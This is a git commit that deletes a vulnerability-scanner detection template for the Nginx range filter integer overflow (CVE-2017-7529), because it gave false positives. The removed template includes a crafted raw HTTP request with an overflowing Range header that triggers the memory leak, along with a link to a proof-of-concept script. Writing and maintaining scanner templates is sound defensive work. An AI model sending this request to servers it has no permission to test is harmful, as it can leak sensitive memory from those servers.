remvoing cve-2017-7529

This can be precisely checked only when Nginx version is known, otherwise it will produce false positives results, as such removing this template for the time being.
patch-1
bauthard 2020-09-27 15:41:50 +05:30
parent a2d60bbd1e
commit 0aee5a9715
1 changed files with 0 additions and 33 deletions

View File

@ -1,33 +0,0 @@
id: cve-2017-7529
info:
author: "Harsh Bothra & @dwisiswant0"
name: "Nginx Remote Integer Overflow"
severity: medium
description: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
# This template supports the detection part only.
# Do not test any website without permission
# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=-17208,-9223372036854758792
Connection: close
matchers-condition: and
matchers:
- type: status
status:
- 206
- type: word
words:
- "Server: nginx"
part: header
- type: word
words:
- "Content-Range"
part: body